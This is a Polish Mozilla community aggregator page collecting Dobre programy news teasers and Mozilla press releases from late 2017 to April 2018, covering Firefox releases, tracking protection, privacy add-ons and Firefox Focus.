Polska Planeta Mozilli

Subskrypcje

Serwisy

Blogi



Kanał RSS

Ostatnia aktualizacja:
19 kwietnia 2018, 18:13

Powered by Venus

Zgłoś błąd
Kontakt

18 kwietnia 2018

Dobre programy

Amazon zrobił przeglądarkę „Lite”. Trzeba pobrać tylko 2 MB

image Przeglądarek dla Androida nie brakuje, ale mimo tego Amazon udostępnił kolejną. Nazywa się po prostu Internet i wyróżnia się tym, że plik APK zajmuje mniej niż 3 MB. To w zasadzie jej jedyny plus. Chrome zajmuje około 21 MB, Edge 54 MB, Firefox 20 MB, Opera zaś 15 MB. Przeglądarka Amazonu jest bardzo uboga. Po uruchomieniu jej zobaczymy kolekcję linków do polecanych stron, a poniżej skrót…
Anna Rymsza, 18 kwietnia 2018, 14:55

11 kwietnia 2018

Dobre programy

Cenisz sobie prywatność? W Firefoksie odizolujesz się teraz także od YouTube'a

imageDużą popularnością cieszy się Facebook Container, wydany niedawno przez Mozillę oficjalny dodatek do Firefoksa, który izoluje użytkownika korzystającego z tytułowego Facebooka oraz Messengera i Instagramu od reszty Internetu. Celem jest rzecz jasna zwiększenie prywatności – dzięki temu inne strony mają nieco utrudnione zadanie, by użytkownika wyśledzić i przekazać portalom dodatkowe informacje…
Oskar Ziomek, 11 kwietnia 2018, 19:37

5 kwietnia 2018

Dobre programy

W Firefoksie bezpieczny nie tylko Facebook, nowy dodatek chroni jeszcze skuteczniej

imagePod koniec ubiegłego miesiąca Mozilla wywołała pozytywny uśmiech na twarzach wielu użytkowników Firefoksa. Udostępniono wówczas oficjalny dodatek do przeglądarki – Facebook Container, który pozwala swobodnie przeglądać zawartość portalu Facebook. Dzięki uruchamianiu go w izolowanym środowisku, nie trzeba obawiać się, że odwiedzając inne strony zapewniamy portalowi dostęp do kolejnych informacji o…
Oskar Ziomek, 5 kwietnia 2018, 18:44

Teoria „too big to fail” – czy Mozilla jest zbyt duża, by zniknąć?

imagePrzełomowe technologie mają tendencję do żywiołowego, skokowego wręcz wzrostu popularności, za czym w większości przypadków nie nadąża ani socjologia, ani prawo – nierzadko w stopniu podważającym fundamenty ustrojowe lub porządek gospodarczy. W ciągu kilku miesięcy okazuje się, że firma oferująca pewne unikatowe rozwiązanie całkowicie monopolizuje nowo powstały sektor branży, dopuszcza się czynów…
Kamil J. Dudek, 5 kwietnia 2018, 13:19

3 kwietnia 2018

Dobre programy

Premiera Firefox Reality – poznajcie nową przeglądarkę Mozilli

imageTrwa dobra passa Mozilli – po sukcesie, jakim okazała się pod koniec zeszłego roku kwantowa rewolucja, fundacja idzie za ciosem i prezentuje nowy wariant swojej przeglądarki. Z repozytorium GitHub można już pobrać do samodzielnej kompilacji kod programu Firefox Reality. Jak nietrudno się domyślić, jest to odmiana Liska dostosowana do gogli rozszerzonej i wirtualnej rzeczywistości. Jak dotąd…
Maciej Olanicki, 3 kwietnia 2018, 14:33

27 marca 2018

Dobre programy

Zostałeś na Facebooku? Firefox pozwala go bezpieczniej przeglądać

imageZamieszanie wokół Facebooka w wyniku ostatniej afery z Cambridge Analytica wykorzystują wszyscy i każdy robi to na swój sposób. Dla wielu jest to świetna okazja, by wreszcie pożegnać się z serwisem, usuwając konto w myśl akcji #deletefacebook, ale nie wszyscy chcą podchodzić do sprawy aż tak przewrotnie. Dla tych, którzy z serwisu nadal korzystają, ale chcieliby zrobić coś, by czuć się w nim…
Oskar Ziomek, 27 marca 2018, 18:01

23 marca 2018

Dobre programy

Mozilla też bojkotuje Facebooka, ale to trudniejsze niż się wszystkim wydaje

image Skandal wiążący Facebooka z kampanią wyborczą Donalda Trumpa zbiera coraz większe żniwo. Ze współpracy z firmą zrezygnował już pierwszy duży reklamodawca – Mozilla. Być może to początek końca niepodzielnego władcy platform społecznościowych, ale gigant będzie upadał powoli. Fundacja Mozilla, prawdopodobnie najlepiej znana jako autor popularnej przeglądarki Firefox, ogłosiła, że wstrzymuje…
Anna Rymsza, 23 marca 2018, 09:39

21 marca 2018

Dobre programy

Test Firefoksa miał zwiększyć prywatność, ale testerzy boją się wycieku swoich danych

imageIntencje były dobre, ale użytkownicy i tak zareagowali krzykiem. Czy dzisiaj już nie można oczekiwać nawet od dobrowolnych testerów zgody na eksperymenty w zakresie prywatności? Inżynierowie Mozilli muszą teraz zastanawiać się, jak wyjść z twarzą z eksperymentu z protokołem DoH (DNS over HTTPS), dzięki któremu będzie można ukryć przed dostawcami Internetu to, o jakie domeny…
Adam Golański, 21 marca 2018, 12:03

19 marca 2018

Dobre programy

Hasło główne Firefoksa już 9 lat temu było niewiele warte. Dzisiaj jest już nic niewarte

imageOd swojego powstania Firefox (oraz klient poczty Thunderbird) korzystał z mechanizmu hasła głównego. W ustawieniach użytkownik mógł sobie wprowadzić hasło, z którego tworzony był klucz używany do zaszyfrowania haseł do witryn internetowych przechowywanych w programie. Ich użycie czy zobaczenie wymagało wpierw wprowadzenia takiego hasła głównego, chroniąc przed np. wykradzeniem pliku z bazą…
Adam Golański, 19 marca 2018, 09:51

15 marca 2018

Dobre programy

Warto przetestować mobilnego Firefoksa. Z nowym silnikiem ma być 2 razy szybszy

imagePocząwszy od drugiej połowy ubiegłego roku, Mozilla robi wszystko, by desktopowy Firefox był znów chętnie wybieraną przeglądarką. Przez lata zaniedbań program stał się ociężały, ale nadal oferował dodatki, które czyniły go użytecznym. Mozilla postanowiła jednak postawić wszystko na jedną kartę: przeprojektować interfejs, zmienić wiele pod maską i ostatecznie przejść wyłącznie na dodatki…
Oskar Ziomek, 15 marca 2018, 14:58

Firefox jako uniwersalna paczka na Ubuntu. Gorszego formatu nie dało się wymyślić

imageZa każdym razem gdy spotykamy się z tematem uniwersalnych paczek oprogramowania na Linuksa, czy to snapów czy flatpaków, mamy wrażenie że te lekarstwa na chorobę braku interoperacyjności między poszczególnymi dystrybucjami są gorsze od samej choroby. Weźmy za przykład popularnego Firefoksa, wydanego właśnie w stworzonym i popularyzowanym przez Canonicala formacie snap. Pierwsze co zdumiewa,…
Adam Golański, 15 marca 2018, 12:58

14 marca 2018

Dobre programy

Rozszerzenie dla Firefoksa pomoże ci opanować bałagan w zakładkach

image Poskromienie bałaganu w zakładkach zebranych w Firefoksie nie musi zajmować dużo czasu. Warto skorzystać z rozszerzenia Bookmarks Organizer, wydanego właśnie w nowej wersji ze sporą porcją poprawek. Bookmarks Organizer to rozwijane od końca ubiegłego roku rozszerzenie typu WebExtension dla nowych wydań Firefoksa. Wersja 2.0 działa z Firefoksem 59. Zadaniem rozszerzenia jest znajdowanie…
Anna Rymsza, 14 marca 2018, 15:29

13 marca 2018

Dobre programy

Nowy Firefox pokaże stronom co im wolno: wreszcie wygodna kontrola uprawnień

imageDzisiaj debiutuje druga już od czasów wydania Firefoksa 57 Quantum duża aktualizacja przeglądarki, która kiedyś odmieniła Internet, a dziś musi walczyć o to, by wciąż się w Internecie liczyć. Firefox 59, którego od kilku tygodni mogliśmy testować w kolejnych kompilacjach z kanału beta dowodzi, że Mozilla idzie dobrą ścieżką. Czy jednak przekłada się to na zainteresowanie internautów? Oba…
Adam Golański, 13 marca 2018, 10:24

28 lutego 2018

Dobre programy

System dla miliardów wykluczonych: kuzyn Firefox OS-a zaistniał w nowej Nokii 8110

imageNiespełna trzy lata pojawiło się ostatnie wydanie mobilnego systemu Firefox OS. Wtedy też pokazano ostatni telefon z systemem Mozilli, ZTE Open L. Potem producent pogodził się z rzeczywistością i zakończył swój kilkuletni eksperyment z pomyleniem systemu operacyjnego z przeglądarką webową. Teraz jednak wygląda na to, że Firefox OS nie całkiem umarł (i nie mamy na myśli…
Adam Golański, 28 lutego 2018, 13:40

20 lutego 2018

Dobre programy

Od maja Firefox wyłączy niebezpieczny protokół FTP, wkrótce go usunie

image W imię bardziej restrykcyjnej ochrony bezpieczeństwa użytkowników przeglądarki coraz częściej blokują nieszyfrowane połączenia. Firefox 60 także pójdzie dalej w tym kierunku i umożliwi nam wyłączenie obsługi połączeń FTP w ustawieniach. Dbałość o szyfrowanie połączeń leży na sercu producentów przeglądarek od lat. Już w 2014 roku była mowa o tym, że Chrome będzie ostrzegał przed połączeniami…
Anna Rymsza, 20 lutego 2018, 12:51

12 lutego 2018

Dobre programy

Netflix w FullHD już nie tylko na Edge – pomogą dodatki do Chrome i Firefoksa

imageNetflix swoich klientów, którzy oglądają treści na PC, dzieli na dwie kategorie. Pierwsza to korzystający z jedynej słusznej przeglądarki Microsoft Edge, druga to ci, którzy korzystają z innych przeglądarek. Pierwsi są lepsi – oferuje się im streaming w rozdzielczości 1080p. Drudzy… no cóż. Bez względu na możliwości łącza jak i wykupienie pakietu Standard, dostają jedynie 720p.…
Adam Golański, 12 lutego 2018, 10:11

31 stycznia 2018

Dobre programy

Krytyczna luka w Firefoksie. Pod ochroną tylko użytkownicy najnowszej wersji

imageW Firefoksie wyryto lukę, którą atakujący może wykorzystać do wykonania kodu z takimi samymi uprawnieniami, jak użytkownik. Choć wcześniej konieczne byłoby nakłonienie internauty do kliknięcia w link lub otwarcia pliku, luka uznana została na krytyczną, gdyż docelowo pozwala atakującemu wykonać niemal dowolny kod – jeśli użytkownik korzysta z podniesionych uprawnień, atakujący również je zyskuje…
Oskar Ziomek (o.zio), 31 stycznia 2018, 16:05

30 stycznia 2018

Dobre programy

Rozszerzenia nowego Firefoksa zaczynają potrafić to, co potrafiły rozszerzenia starego

imageOstateczne porzucenie przez Mozillę platformy XUL w Firefoksie kosztowało nas wszystkich tysiące klasycznych rozszerzeń tej przeglądarki, które z dnia na dzień przestały działać. Setki tych najlepszych i najpopularniejszych w jakimś stopniu udało się przenieść na nową, obsługującą webowe języki programowania platformę WebExtensions. Szybko jednak zobaczyliśmy, że z ich jakością bywa…
Adam Golański (eimi), 30 stycznia 2018, 16:06

25 stycznia 2018

Dobre programy

Nowy Tor Browser stawia na prostotę, by chronić prywatność mógł każdy

imageUmożliwiająca nawiązanie połączenia z węzłami sieci tor przeglądarka Tor Browser otrzymała aktualizację, która podnosi numer wersji do 7.5. Wśród zmian znalazł się odświeżony ekran powitalny. Został przeprojektowany, by stać się łatwiejszym w użyciu nawet dla osób, które stawiają w deep weeb pierwsze kroki. Nowa wersja Tor Browser bazuje na Firefoksie ESR 52.6, przeglądarce Mozilli z…
Mateusz Budzeń (Scorpions.B), 25 stycznia 2018, 20:06

Centrum prasowe Mozilli

Szybsza i lepsza ochrona prywatności w ramach opcji Opt-in Tracking Protection oraz inne zmiany w najnowszym wydaniu Firefox Quantum

Coraz częściej rzeczy, których nie zaakceptowalibyśmy w świecie fizycznym, akceptujemy w świecie on-line. Na przykład, jak byście się poczuli, gdybyście zajrzeli na chwilę do sklepu, po czym przez kolejny miesiąc otrzymywalibyście pocztą ulotki z jego ofertą, mimo że nic tam nie kupiliście? Strony, które odwiedzamy w Internecie często nas śledzą, chociaż nie jest do końca jasne, kiedy i w jaki sposób wykorzystują zebrane na nasz temat informacje. Aby dolać oliwy do ognia, warto wspomnieć o tym, że proces ten dodatkowo spowalnia pracę naszych przeglądarek.

Międzynarodowy Dzień Ochrony Danych Osobowych, który obchodzimy 28 stycznia, jest więc doskonałą okazją, aby porozmawiać o jednej z najpotężniejszych funkcji Firefox Quantum, a mianowicie o Opt-in Tracking Protection. Ochrona przed śledzeniem została uruchomiona w trybie przeglądania prywatnego dwa lata temu jako coś zupełnie nowego na rynku. Użytkownicy mogli swobodnie przeglądać strony internetowe w trybie prywatnym, bez obawy przed śledzeniem i zalewem niechcianymi reklamami. Dokładnie przyjrzeliśmy się tej opcji i odkryliśmy, że oprócz ochrony prywatności, pozwala użytkownikom szybciej i sprawniej przeglądać witryny w Internecie, gdy strony ładują się bez trackerów. Dlatego też w listopadzie dodaliśmy w Firefox Quantum opcję, która oferuje naszym użytkownikom możliwość włączenia ochrony śledzenia 24/7. Wyniki testu znajdziesz tutaj.

Jedną z najważniejszych zalet włączonego Tracking Protection było szybsze i sprawniejsze przeglądanie stron internetowych. A przecież każdy lubi szybką przeglądarkę. Zobacz wideo: https://youtu.be/pDZXaegVuUE

Aby włączyć ochronę przed śledzeniem, wystarczy otworzyć folder „Preferencje” i kliknąć opcję „Prywatność i bezpieczeństwo”. Przewiń w dół, aby przejść do „Ochrona przed śledzeniem,” i kliknij „Zawsze”. Opcja Tracking Protection właśnie została uruchomiona.

Jest również dostępna na urządzeniach mobilnych. Aby zobaczyć, jak uruchomić ją
w swoim telefonie, kliknij w linki  Firefox for iOS lub Android.

Znacznie szybszy Firefox for Fire TV

Korzystając z rozwiązań ochrony śledzenia, które stosujemy w Firefox i Firefox Focus, tryb „Turbo” będzie dostępny w tym tygodniu również w Firefox for Fire TV. Dlaczego „turbo”? Ponieważ zapewnia szybsze i mniej zamglone przeglądanie witryn www. Funkcja ta jest włączona domyślnie, jednak przy włączonym trybie „Turbo”, mogą wystąpić sytuacje, w których wystąpi problem z ładowaniem strony. W takich przypadkach funkcja ta może być zarządzana z Menu.

Nowe funkcje w najnowszej wersji Firefoksa

Najnowsza wersja bazuje na mocnych fundamentach, zapewnionych przez Firefox Quantum i oferuje nowe możliwości i funkcje w przeglądarce Firefox na Androida.

Szybszy i bardziej płynny dostęp do Internetu dzięki lepszej grafice

Każdy z Was na pewno czekał kiedyś cierpliwie aż dana strona się załaduje. Rozmazane zdjęcia i tekst, wszystko jeszcze bardziej spowalnia, a w końcu strona się zawiesza. Zapewniamy, że robimy wszystko, aby zminimalizować liczbę takich sytuacji w Firefoksie. Aby pomóc zredukować nieprawidłowości, Firefox Quantum wprowadza ulepszony silnik, wykorzystujący dedykowany procesor CPU. Efektem tej poprawy jest fakt, że Firefox Quantum jest teraz jeszcze szybszy, a na wielu stronach internetowych – znacznie bardziej płynny. Skąd to wiemy? Nasi inżynierowie stworzyli test, który symuluje działanie ciężkiego JavaScriptu. Podczas wykonywania tego testu, szybkość odświeżania Firefoksa poprawiła się o 30% (z 31 do 40 klatek na sekundę).  Tutaj możesz przeczytać więcej na ten temat.

Dane na podstawie testu Mozilli, opisanego tutaj.

 

To solidny postęp, ale nie zatrzymujemy się. Obecnie pracujemy nad integracją WebRender, rozwiniętego w ramach projektu badawczego Servo, z przeglądarką Firefox Quantum. Mamy nadzieję, że WebRender sprawi, iż Firefox Quantum będzie oferował jeszcze większą liczbę klatek na sekundę. W ciągu kolejnych miesięcy, opowiemy więcej na ten temat.

Nowe funkcje Firefox for Android

Jeśli jeszcze nie zainstalowałeś nowej wersji Firefox Quantum, zapraszamy do pobrania najnowszej wersji tutaj.

 

 

 

 

 

Centrum prasowe Mozilli, 25 stycznia 2018, 14:26

28 stycznia obchodzimy Europejski Dzień Ochrony Danych Osobowych. Firefox wprowadziło możliwość ochrony przed śledzeniem 24/h

Nie zatrzymujemy się – wprowadzamy kolejne usprawnienia w Firefoksie, aby działał jeszcze szybciej i sprawniej. Dzięki najnowszej wersji przeglądarki, użytkownicy mają kontrolę nad tym przez kogo i kiedy są śledzeni w sieci.

Podczas przeglądania niektórych stron, często jesteśmy śledzeni przez skrypty, które gromadzą dane o tym, gdzie się znajdujemy i co robimy. Skrypty te mogą pożerać Twoje dane, spowalniać działanie przeglądarki i sprawiać, że widzisz reklamy, które na podstawie Twojej historii przeglądania, sugerują Ci co chciałbyś kupić i zobaczyć.

Zauważyliśmy, że przy włączonej opcji prywatnego przeglądania z ochroną śledzenia, Firefox jest znacznie szybszy niż Chrome, nawet w trybie Incognito. Jak bardzo? Czas załadowania Firefox Quantum jest mniejszy o ponad połowę.

 

Potrzebujesz więcej dowodów? Umieściliśmy dwie przeglądarki obok siebie – z włączoną
i z wyłączoną ochroną śledzenia, aby móc zaobserwować postęp ładowania strony www. Rezultaty znajdziesz w poniższym video:

https://youtu.be/saOmYxizNmw

Uważamy, że jest to dość istotne, dlatego oddzieliliśmy ochronę śledzenia od przeglądania prywatnego. Oznacza to, że możesz ustawić opcję ochrony śledzenia w na cały czas, tylko w przeglądarce prywatnej lub w ogóle.

Oto jak to zrobić:

  1. Kliknij przycisk Menu i wybierz Preferencje.
  2. Kliknij przycisk Prywatność & Bezpieczeństwo po lewej stronie i przejdź do sekcji Ochrona śledzenia.

  1. Wybierz jedną z poniższych opcji:
    1. Zawsze: Zachowaj ochronę śledzenia podczas przeglądania.
    2. Tylko w prywatnych oknach: Włącza ochronę śledzenia tylko wtedy, gdy używasz opcji Incognito.
    3. Nigdy: Wyłącza ochronę śledzenia dla wszystkich miejsc.

Ustawiając opcję Ochrony Śledzenia tak, aby zawsze była włączona, nie będziesz wciąż dostawał przypomnień o tym, że jakiś czas temu oglądałeś dany przedmiot, a dodatkowo, wraz z poprawą czasu ładowania strony, możesz szybko i sprawnie surfować między witrynami.

 

 

Centrum prasowe Mozilli, 25 stycznia 2018, 10:54

22 stycznia 2018

Dobre programy

Nowy Firefox na Androida z obsługą progresywnych aplikacji

imageW weekend na serwerach Mozilli pojawił się Firefox 58 w wersji na Windowsa i macOS-a. Przyniósł on istotne zmiany pod maską – dzięki nowemu kompilatorowi WebAssembly, duże aplikacji webowe przyśpieszą w Firefoksie nawet kilkunastokrotnie. Teraz optymalizacja WebAssembly trafia także na Firefoksa na Androida, wraz z kolejnymi ważnymi nowościami. Najważniejszą nowością w Firefoksie 58 jest…
Maciej Olanicki (b.munro), 22 stycznia 2018, 15:22

20 stycznia 2018

Dobre programy

Firefox 58 już jest! Aplikacje w przeglądarce nawet kilkunastokrotnie szybsze

imageW poprzednim dużym wydaniu Firefoksa, wersji 57 Quantum, Mozilla przygotowała ogrom nowości. Było ich na tyle dużo, że można było pozwolić sobie na co najmniej kilka miesięcy rozwoju, który będzie skupiał się na poprawkach i szlifowaniu dotychczasowych osiągnięć. Nic z tego – w naszej bazie znaleźć już możecie Firefoksa 58, który może nie jest już wydaniem rewolucyjnym, ale przynosi ważną nowość…
Maciej Olanicki (b.munro), 20 stycznia 2018, 17:00

19 stycznia 2018

Dobre programy

Internet kłódeczek: Firefox odmówi swoich funkcji niezaszyfrowanym stronom

imageMozilla coraz bardziej odcina się od nieszyfrowanej sieci. W 2015 roku producent Firefoksa ogłosił, że przyjdzie dzień, po którym wszystkie nowe funkcje przeglądarki będą dostępne tylko dla bezpiecznych witryn. Potem przyjdzie zaś czas, by witrynom nie stosującym połączeń po HTTPS zacząć ograniczać dostęp do istniejących funkcji przeglądarki, w szczególności tych związanych z…
Adam Golański (eimi), 19 stycznia 2018, 13:42

18 stycznia 2018

Dobre programy

Nowy Firefox uruchomi gry i aplikacje webowe tak szybko, jakby ładował obrazki

imagePo długich latach zmagań między rozwiązaniami mającymi pozwolić na jak najszybsze uruchamianie aplikacji w przeglądarkach, w 2015 roku wyłonił się standard WebAssembly. Definiuje on binarny format plików .wasm i odpowiadający mu źródłowy format tekstowy kodu przypominającego assembler. Kod taki uruchamiany jest na przenośnej maszynie stosowej, z szybkością bliską szybkości natywnego kodu, w…
Adam Golański (eimi), 18 stycznia 2018, 11:48

15 stycznia 2018

Dobre programy

Firefox wczyta kartę zanim ją klikniesz dzięki mechanizmowi „rozgrzewki”

imageDominacja Google Chrome przeniosła ciężar oczekiwań użytkowników z funkcjonalności na szybkość. Po latach zaniedbań, pod koniec zeszłego roku, do gry wrócił Firefox – implementacja elementów silnika Servo poskutkowało odczuwalnym przez użytkowników przyśpieszeniem i pochwałami, jakich Mozilla nie słyszała od miesięcy. Rewolucja Quantum to jednak dla Firefoksa dopiero pierwszy krok, by (znów)…
Maciej Olanicki (b.munro), 15 stycznia 2018, 17:43

Malwarebytes przez pomyłkę udostępnione jako dodatek do Firefoksa

imageWśród dodatków dostępnych dla Firefoksa pojawiła się eksperymentalna wersja Malwarebytes, co ciekawe dość niespodziewanie i bez dodatkowych informacji na stronie producenta. Polegając wyłącznie na jednozdaniowym opisie w Firefox Add-ons stwierdzić można, że dodatek ma wykrywać i chronić przed szkodliwymi elementami w Sieci, ale szczegóły jego działania nie są jeszcze znane. Po instalacji…
Oskar Ziomek (o.zio), 15 stycznia 2018, 15:25

Jak skutecznie wyłączyć telemetrię w Firefoksie? Jedno kliknięcie to za mało

imageWyłączanie telemetrii (czyli funkcji szpiegowskich) w Windowsie 10 niestety nie ogranicza się do odznaczenia kilku opcji podczas instalacji systemu. By wyciszyć system lepiej jest skorzystać z aplikacji takich jak DoNotSpy – gdzie zobaczymy, że tych ustawień jest naprawdę sporo. Ale myślicie, że taki problem tylko Microsoftu dotyczy? Niestety tak nie jest. Nawet Mozilla, czempion…
Adam Golański (eimi), 15 stycznia 2018, 14:50

14 stycznia 2018

Dobre programy

Firefox z wydłużonym wsparciem będzie łatwiejszy w konfiguracji

imageMozilla zmienia zasady, jakie będą obowiązywać w Firefoksie z wydłużonym wsparciem, z którego korzystają najczęściej organizacje oraz szkoły, ale także indywidualni użytkownicy. Wraz z premierą Firefoksa 60 ESR w maju, pojawi się tu możliwość korzystania z silnika zasad (Policy Engine), dzięki któremu administratorzy będą mogli łatwiej i w większym zakresie personalizować program i integrować go…
Oskar Ziomek (o.zio), 14 stycznia 2018, 14:05

8 stycznia 2018

Dobre programy

Firefox pozwoli jednocześnie blokować wszystkie powiadomienia

imageJest dobra wiadomość dla wszystkich, którzy nie przepadają za ciągłym odrzucaniem propozycji wysyłania powiadomień push oraz udzielania zezwoleń na dostęp do lokalizacji czy mikrofonu podczas korzystania z Internetu. Firefox 59 pozwoli na globalne ich odrzucanie, dzięki wybraniu odpowiedniej opcji w ustawieniach. Możliwość tę można już teraz testować w Firefoksie 59 Nightly, choć stabilne wydanie…
Oskar Ziomek (o.zio), 8 stycznia 2018, 18:14

5 stycznia 2018

Dobre programy

Firefox i Edge już odporne na wykradzenie haseł z pamięci. Z Chrome trzeba poczekać

imageWczoraj dział Public Relations Intela przypominał, że podatności w jego procesorach nie są wcale takie groźne, ponieważ nie dają napastnikom możliwości uszkodzenia, zmodyfikowania czy skasowania danych. Po części jest to prawda – po prostu pozwalają one odczytać z pamięci wrażliwe dane, hasła i klucze kryptograficzne. Nie dość groźne? Sęk w tym, że Intel stwierdził też, że ataki te nie mogą…
Adam Golański (eimi), 5 stycznia 2018, 14:16

3 stycznia 2018

Dobre programy

Która przeglądarka internetowa była najchętniej wybierana w 2017 roku?

imageGdy przyjrzeć się przeglądarkom internetowym, ubiegły rok upłynął przede wszystkim w skupieniu wokół przełomowej wersji Firefoksa, który ze swoim nowym interfejsem i zmianami pod maską miał zrewolucjonizować rynek. Odczucia użytkowników są mieszane, ale bardziej obiektywny obraz całej sytuacji powinny dać statystyki. Przyjrzeliśmy się zatem jak na przestrzeni ostatniego roku zmienił się udział w…
Oskar Ziomek (o.zio), 3 stycznia 2018, 15:35

27 grudnia 2017

Dobre programy

Warto zaktulizować Thunderbirda – Mozilla załatała krytyczną lukę

imageWielu obawiało się, że przyszłość Thunderbirda, który po zawirowaniach finalnie wrócił na łono Mozilli, stoi pod znakiem zapytania. Wygląda jednak na to, że Fundacja wcale nie traktuje klienta poczty po macoszemu – w ostatnim czasie zapowiedziano odpowiednik kwantowej rewolucji (poza nowym interfejsem migracja na WebExtension), a dziś udostępniono ważną aktualizację bezpieczeństwa. Opublikowana…
Maciej Olanicki (b.munro), 27 grudnia 2017, 16:17

22 grudnia 2017

Dobre programy

Firefox celowo spowalnia śledzące nas skrypty, aby szybciej załadować strony

imageOgromny wzrost szybkości ładowania stron internetowych przez Firefoksa 57 nie wziął się tylko z nowego silnika Quantum. Jeden z programistów Mozilli ujawnił właśnie, że w pewnym sensie przeglądarka ta łamie zasadę neutralności sieci. Traktuje pewne zasoby internetowe jako gorsze od innych i opóźnia ich ładowanie. Użytkownicy nie powinni jednak z tego powodu narzekać – te gorsze zasoby to…
Adam Golański (eimi), 22 grudnia 2017, 11:16

20 grudnia 2017

Dobre programy

Thunderbird: nowa wersja klienta pocztowego na miarę rewolucji w Firefoksie?

imagePod koniec 2015 roku zapadła decyzja, że popularny klient poczty Thunderbird nie będzie już rozwijany pod skrzydłami Mozilli. Po ponad roku namysłów i negocjacji, dzięki którym Thunderbird miał znaleźć nowego właściciela, zdecydowano, że projekt jednak pozostanie. Z kolei teraz, dokładniej poznaliśmy jego przyszłość. Wcześniejsze działania Mozilli pozostawiły ślad – teraz przy każdej nowej…
Mateusz Budzeń (Scorpions.B), 20 grudnia 2017, 17:06

18 grudnia 2017

Dobre programy

Mozilla nawet przeprosić nie umie za potajemną instalację reklamy serialu

imageTyle starań programistów, tyle starań marketingu, świetny Firefox 57 ciepło przyjęty przez użytkowników i recenzentów – a tu nagle jeden bezmyślny ruch, po którym społeczność internetowa nie zostawiła na Mozilli suchej nitki. I my nie możemy znaleźć nic na obronę twórców w założeniu wolnej i opensource’owej przeglądarki. Ciche wstrzyknięcie reklamowego rozszerzenia jest czymś, czego prędzej…
Adam Golański (eimi), 18 grudnia 2017, 11:27

16 grudnia 2017

Dobre programy

Firefox 57 ma już ponad miesiąc. Mozilla jest dumna, a co z użytkownikami?

image14 listopada br. rozpoczęła się nowa era dla Mozilli. Oficjalny debiut Firefoxa 57 Quantum uwieńczył łącznie ponad cztery lata starań, mających przynieść do opensource’owej przeglądarki przełomowe technologie renderowania i kompozycji stron. Od strony technicznej Mozilla odniosła spektaktularny sukces – nowy Firefox jest szybszy niż kiedykolwiek wcześniej, jest w wielu testach szybszy…
Adam Golański (eimi), 16 grudnia 2017, 08:34

15 grudnia 2017

Dobre programy

Firefox Focus z dowolną wyszukiwarką i podpowiedziami adresów

imageMozilla zaktualizowała Firefoksa Focus, przeglądarkę mobilną, w której najwyższym priorytetem ma być zapewnienie użytkownikowi bezpieczeństwa i prywatności poprzez blokowanie reklam oraz wszelkich mechanizmów śledzenia. Od początku sposób realizacji tych założeń mógł jednak dziwić, bo w programie brakowało nawet najprostszych, typowych elementów interfejsu, takich jak przeglądania stron na…
Oskar Ziomek (o.zio), 15 grudnia 2017, 13:01

14 grudnia 2017

Centrum prasowe Mozilli

Firefox Focus zapewnia szybki dostęp do stron bez kompromisów w zakresie prywatności

Minął już ponad rok od momentu, gdy uruchomiliśmy Firefox Focus. Odnieśliśmy ogromny sukces, wprowadzając ponad 27 języków, a także zdobywając liczbę ponad miliona pobrań w ciągu pierwszego miesiąca od uruchomienia naszej aplikacji na Androida.

Dzisiaj przedstawiamy nową funkcję: szybszy dostęp do najczęściej odwiedzanych witryn, a także możliwość dodania dowolnej wyszukiwarki do aplikacji Focus. Były to najbardziej pożądane przez naszych użytkowników usprawnienia, które zgodnie z naszymi celami sprawiają, że Focus jest tak dobry.

Wiemy, że nasi użytkownicy chcą mieć wybór i wygodę posiadania ulubionych witryn i wyszukiwarek w zasięgu ręki, ale nie chcą rezygnować z prywatności. Od momentu, w którym stworzyliśmy Focusa, naszym celem było umożliwienie użytkownikom szybkiego dostępu do informacji i stron, jednocześnie zabezpieczając ich dane.

Wszyscy mamy swoje ulubione strony, do których regularnie wracamy – niezależnie od tego, czy dotyczą najnowszych wiadomości ze świata, czy wyników drużyny sportowej, której kibicujemy. Teraz możesz dodawać najczęściej odwiedzane portale do swojej listy w aplikacji. Oznacza to, że tylko Ty możesz zobaczyć adres URL witryny na tej liście. Tak więc, w momencie, gdy chcesz sprawdzić wynik meczu, wystarczy wpisać kilka liter, a autouzupełnianie zakończy pracę za Ciebie.

Nową opcją jest także możliwość dodawania wyszukiwarki z dowolnej strony posiadającej pole do wyszukiwania żądanego hasła. Jeśli chcesz skorzystać z wyszukiwarki, której nie ma na naszej sugerowanej liście wystarczy, że ją dodasz. Na przykład, jeśli chcesz zobaczyć film w ten weekend, ale nie chcesz tracić czasu na kiepską produkcję, możesz sprawdzić wybrany tytuł na rottentomatoes.com. Wiemy, że możliwość wyboru jest ważna dla naszych użytkowników, dlatego ta nowa funkcja umożliwia im skonfigurowanie preferowanego sposobu wyszukiwania w Internecie.

Jednym z powodów, dla których użytkownicy uwielbiają Focusa, jest szybszy czas ładowania dzięki automatycznemu blokowaniu reklam i śledzenia. Szybko przenosi Cię do miejsc, w których chcesz się znaleźć i właśnie to wyróżnia nas na tle innych przeglądarek. Zbudowaliśmy Focusa jako najszybszą i najłatwiejszą wyszukiwarkę stworzoną z myślą o Tobie.

Najnowszą wersję Firefox Focus możesz pobrać na Google Play i App Store.

Centrum prasowe Mozilli, 14 grudnia 2017, 09:21

Rekordowy wzrost Firefox Quantum

Decydując się na początku roku na wcześniejszą premierę Firefox Quantum, wiedzieliśmy, że posiadamy ulepszony produkt. Nie tylko wydawał się szybszy na zewnątrz i na wykresach, ale był mierzalnie szybszy. Dzięki wielokrotnym zmianom, podwoiliśmy prędkość Firefoksa z możliwością zużywania o 30% mniej pamięci niż przeglądarka Chrome.

W niespełna miesiąc, Firefox Quantum został zainstalowany na ponad 170 milionach urządzeń na całym świecie. Dopiero się rozkręcamy, a takie zwroty akcji są bardzo zachęcające.

Oto przykłady najlepszych wskaźników jakie pojawiły się od premiery Firefox Quantum:

  1. Nasze największe wydanie. Firefox Quantum to najszybsza ścieżka do 100 milionów profile i pół miliarda godzin dziennego użytkowania w nowym wydaniu, z nową pamięcią. Produkt jest bezproblemowy i szybko rozrasta się o nowe profile. Miliony użytkowników cały czas dołączają do rodziny Firefox Quantum.
  2. Coraz więcej użytkowników przechodzi z Chroma. Zauważyliśmy 44 procentowy wzrost (w porównaniu do zeszłego roku) w pobieraniu naszej przeglądarki przez osoby korzystające do tej pory z Chrome.
  3. Rośnie również liczba użytkowników mobilnych. Nasze czterordzeniowe aplikacje mobilne są częściej pobierane od momentu wprowadzenia Firefox Quantum na rynek. Firefox na iOS i Androida odnotował 24% wzrost w pobieraniach, a Firefox Focus na Androida i iOS wykazał 48% wzrost w instalacji aplikacji.
  4. Ekosystem dodatków pozostaje silny. Na stronie addons.mozzila.org dodano ponad 1000 gotowych do użycia rozszerzeń od premiery Firefox Quantum.
